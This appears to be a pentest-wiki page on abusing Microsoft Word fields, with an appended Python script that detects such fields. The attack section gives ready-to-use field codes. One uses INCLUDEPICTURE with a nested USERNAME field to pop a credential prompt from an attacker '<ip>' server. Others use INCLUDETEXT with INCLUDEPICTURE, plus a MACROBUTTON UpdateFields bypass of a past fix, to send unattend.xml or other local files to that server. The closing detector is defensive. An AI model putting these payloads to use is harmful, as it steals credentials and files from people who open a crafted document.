Field Abuse

Fields are a feature in MS Word for creating dynamic components that automate tasks such as updating dates or page numbering. To insert a field, go to: Insert > Quick Parts > Field. You will then see a full list of field types to choose from.

Credential Popup

This uses the INCLUDEPICTURE field pointing at a web server that replies with an HTTP Basic authentication challenge. The URL of the INCLUDEPICTURE field is made dynamic with a nested USERNAME field. Note that Word does not continue loading the document until the picture has loaded.

{ INCLUDEPICTURE \d "http://<ip>/{ USERNAME \* MERGEFORMAT}"\* MERGEFORMATINET }

Note: your server needs to reply with an HTTP Basic authentication challenge to capture credentials.

Arbitrary File Read

The INCLUDETEXT field reads a file and includes its contents in the document, which is all that is needed to read the file. To send the file contents back to a server, the INCLUDEPICTURE field is used.

NOTE: CVE-2002-1143 abused INCLUDETEXT and INCLUDEPICTURE to read arbitrary files, but Microsoft fixed this by no longer automatically updating INCLUDETEXT fields on various events.

{ INCLUDEPICTURE { QUOTE "http://server" & { FILENAME \p } & { INCLUDETEXT "c:\read\file.txt" } } \d }

To bypass this mitigation, the MACROBUTTON field with the "UpdateFields" option is used, which updates the fields and triggers the arbitrary file read.

{ MACROBUTTON UpdateFields { INCLUDEPICTURE \d "http://picture.com/picture.png" \* MERGEFORMATINET }{ INCLUDEPICTURE "http://<ip>/?{ INCLUDETEXT "c:\\windows\\panther\\unattend.xml" \c XML \* MERGEFORMAT }" \d \* MERGEFORMAT }}

This creates a picture-button hybrid: if the user double-clicks it and accepts the prompt, the MACROBUTTON field updates all the fields and causes the contents of the named file to be sent to the web server.
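As an added detection-side example (not part of the original page), the following Python scans the field codes inside a document's word/document.xml for the patterns described above: INCLUDEPICTURE pointing at a remote URL, a USERNAME field, INCLUDETEXT, and MACROBUTTON UpdateFields. The sample XML and the 203.0.113.5 address are constructed for the example; in practice you would unzip the .docx and pass it the contents of word/document.xml.

```python
import re
import xml.etree.ElementTree as ET

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"

# Field-code patterns matching the techniques described on this page.
SUSPICIOUS = {
    "remote_picture": re.compile(r"INCLUDEPICTURE\b.*https?://", re.I),
    "username_in_field": re.compile(r"\bUSERNAME\b", re.I),
    "local_file_read": re.compile(r"\bINCLUDETEXT\b", re.I),
    "updatefields_button": re.compile(r"MACROBUTTON\s+UpdateFields\b", re.I),
}

def extract_field_codes(document_xml: str) -> list:
    """Return the instruction text of each field in a word/document.xml.
    Complex fields store their code in w:instrText runs between fldChar
    begin/end markers; nested fields simply add more instrText runs, so
    joining every run in a paragraph gives one searchable string."""
    root = ET.fromstring(document_xml)
    codes = []
    for para in root.iter(f"{{{W_NS}}}p"):
        runs = [t.text or "" for t in para.iter(f"{{{W_NS}}}instrText")]
        if runs:
            codes.append(" ".join(runs))
        for simple in para.iter(f"{{{W_NS}}}fldSimple"):  # single-element fields
            codes.append(simple.get(f"{{{W_NS}}}instr", ""))
    return codes

def scan_field_codes(codes) -> set:
    """Names of the suspicious patterns present in any of the field codes."""
    return {name for code in codes for name, pat in SUSPICIOUS.items() if pat.search(code)}

# Constructed sample: the credential-popup field from above, with a
# documentation-range IP standing in for the attacker host, plus a harmless PAGE field.
SAMPLE_DOCUMENT_XML = f"""<w:document xmlns:w="{W_NS}"><w:body>
<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>
<w:r><w:instrText> INCLUDEPICTURE \\d "http://203.0.113.5/</w:instrText></w:r>
<w:r><w:fldChar w:fldCharType="begin"/></w:r>
<w:r><w:instrText> USERNAME \\* MERGEFORMAT </w:instrText></w:r>
<w:r><w:fldChar w:fldCharType="end"/></w:r>
<w:r><w:instrText>" \\* MERGEFORMATINET </w:instrText></w:r>
<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p>
<w:p><w:fldSimple w:instr=" PAGE "/></w:p>
</w:body></w:document>"""

if __name__ == "__main__":
    print(scan_field_codes(extract_field_codes(SAMPLE_DOCUMENT_XML)))
```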
